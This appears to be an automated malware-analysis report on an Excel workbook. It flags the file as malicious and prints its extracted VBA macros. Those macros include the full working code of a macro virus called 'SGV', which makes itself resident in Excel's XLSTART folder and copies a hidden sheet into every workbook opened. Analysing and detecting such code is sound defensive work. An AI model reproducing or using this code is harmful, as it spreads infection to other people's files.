MALICIOUS
116
Risk Score
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
ChDir Application.StartupPath -
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADERThe macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.Matched line in script
Application.OnSheetActivate = "check_files" -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9521 bytes |
SHA-256: 82188ebf8968546c1997b9605100308f28d690180a6837e8626981cb77de7bd2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public bflag As Boolean
Private Sub Workbook_Open()
ActiveWorkbook.PrecisionAsDisplayed = True
End Sub
Private Sub Workbook_SheetCalculate(ByVal Sh As Object)
On Error Resume Next
If Sh.Name = "THDT" And bflag = False Then
bflag = True
Dim intFirstRow%, intLastRow%, intCol%
With ActiveWorkbook
intFirstRow = .CustomDocumentProperties("FirstRow")
intLastRow = .CustomDocumentProperties("LastRow")
intCol = .CustomDocumentProperties("Col")
End With
Dim i%, intRow%, strFormu$
For i = intFirstRow To intLastRow
If IsError(Sh.Cells(i, intCol).Value) = True Then
strFormu = Sh.Cells(i, intCol).Formula
Sh.Cells(i, intCol).Value = 0
intRow = i
Exit For
End If
Next
Sh.Cells(intRow, intCol).Formula = strFormu
End If
End Sub
Attribute VB_Name = "SGV"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "SGV.XLS")
If m$ = "SGV.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
Application.ScreenUpdating = False
N4$ = ActiveWorkbook.Name
Sheets("SGV").Visible = True
Sheets("SGV").Select
Sheets("SGV").Copy
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.Name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "SGV.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(N4$).Sheets("SGV").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "SGV.XLS!check_files"
Case 1
Application.ScreenUpdating = False
N4$ = ActiveWorkbook.Name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(N4$).Sheets(1).Name
If s$ <> "SGV" Then
Workbooks("SGV.XLS").Sheets("SGV").Copy before:=Workbooks(N4$).Sheets(1)
Workbooks(N4$).Sheets("SGV").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "SGV.XLS!check_files"
Case Else
End Select
End Sub
Attribute VB_Name = "Module1"
Option Explicit
Public Const LOCALE_USER_DEFAULT = &H400
Private Const LOCALE_SDECIMAL = &HE
'Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
Dim strXMLPath$
Function Dround(Num As Double, place As Integer) As Double
Dround = Round(Num * 10 ^ place) / 10 ^ place
End Function
Public Function Add_Refs(strPath$)
On Error GoTo m_exit
Application.VBE.ActiveVBProject.References.AddFromFile strPath & "Adt2excel.dll"
Exit Function
m_exit:
MsgBox Err.Number & ": " & Err.Description
End Function
Public Function CreateReport()
On Error GoTo m_exit
Dim cConnect As New ADODB.Connection
strXMLPath = ActiveWorkbook.CustomDocumentProperties("Where13")
Call Open_Connection(ActiveWorkbook, cConnect)
Call DuToanDGCT_MainInfo(ActiveWorkbook, cConnect, strXMLPath$)
Set cConnect = Nothing
Call Del_Refs
Exit Function
m_exit:
MsgBox Err.Number & ": " & Err.Description
End Function
Public Function Del_Refs()
On Error Resume Next
Dim i%
Application.DefaultSaveFormat = 56 '=xlExcel8
With Application.VBE.ActiveVBProject
For i = 1 To .References.Count
If .References(i).Name = "Adt2Excel" Then .References.Remove .References(i)
Next
End With
End Function
Public Function bangchu(so As Double, donvi As String, Optional ptdv As String) As String
bangchu = ""
If so = 0 Or so = Null Then Exit Function
If so < 0 Then
bangchu = Sheets("Data").Cells(2, 5) & " " ' "am"
so = -so
End If
If so < 1E+15 Then
If Int(so) <> 0 Then
bangchu = bangchu & viet(so) & " " & donvi
End If
End If
bangchu = Trim(bangchu)
If bangchu <> "" Then
bangchu = UCase(Left(bangchu, 1)) & Right(bangchu, Len(bangchu) - 1)
Else
bangchu = Sheets("Data").Cells(1, 5) '"solon")
End If
End Function
Function viet(so As Double) As String
Dim chu As Variant, hang As Variant, sosai As Variant, thaythe As Variant
Dim s1 As String, s2 As String, x As Long, i As Integer
If so < 1E+15 Then
ReDim chu(9)
For i = 0 To 9
chu(i) = Sheets("Data").Cells(i + 1, 1)
Next
ReDim hang(16)
For i = 0 To 16
hang(i) = Sheets("Data").Cells(i + 1, 2)
Next
ReDim sosai(11)
For i = 0 To 11
sosai(i) = Sheets("Data").Cells(i + 1, 3)
Next
ReDim thaythe(11)
For i = 0 To 11
thaythe(i) = Sheets("Data").Cells(i + 1, 4)
Next
s1 = Trim(Str(Int(so)))
viet = ""
If s1 = 0 Then Exit Function
viet = chu(Val(Right(s1, 1)))
For i = Len(s1) - 1 To 1 Step -1
viet = chu(Val(Mid(s1, i, 1))) & " " & hang(Len(s1) - i - 1) & " " & viet
Next
viet = Trim(viet)
For i = 0 To 11
viet = thay(viet, " ", " ")
viet = thay(viet, CStr(sosai(i)), CStr(thaythe(i)))
Next
Else
viet = Sheets("Data").Cells(1, 5) '"solon")
End If
End Function
Function thay(s1 As String, s2 As String, s3 As String) As String
Dim x As Long
thay = s1
x = InStr(1, thay, s2)
While x <> 0
thay = Left(thay, x - 1) & s3 & Right(thay, Len(thay) - x - Len(s2) + 1)
x = InStr(1, thay, s2)
Wend
thay = Trim(thay)
End Function
Function TKL(strCell$) ', Optional iRound% = 3)
Dim strCTCT$, inti%, inti1%
strCTCT = strCell
inti = InStrRev(strCTCT, ":")
inti1 = InStrRev(strCTCT, "=")
If inti = 0 And inti1 = 0 Then GoTo m_result
If inti = 0 Then
inti = inti1
Else
If inti1 > inti Then inti = inti1
End If
Select Case Right(Trim(Left(strCTCT, inti - 1)), 1)
Case "<", ">"
Exit Function
End Select
strCTCT = Replace(Right(strCTCT, Len(strCTCT) - inti), "x", "*")
strCTCT = Replace(strCTCT, ",", ".")
m_result:
TKL = Evaluate(strCTCT)
' TKL = Round(Evaluate(strCTCT), iRound)
End Function
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet12"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet14"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet13"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet19"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet20"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.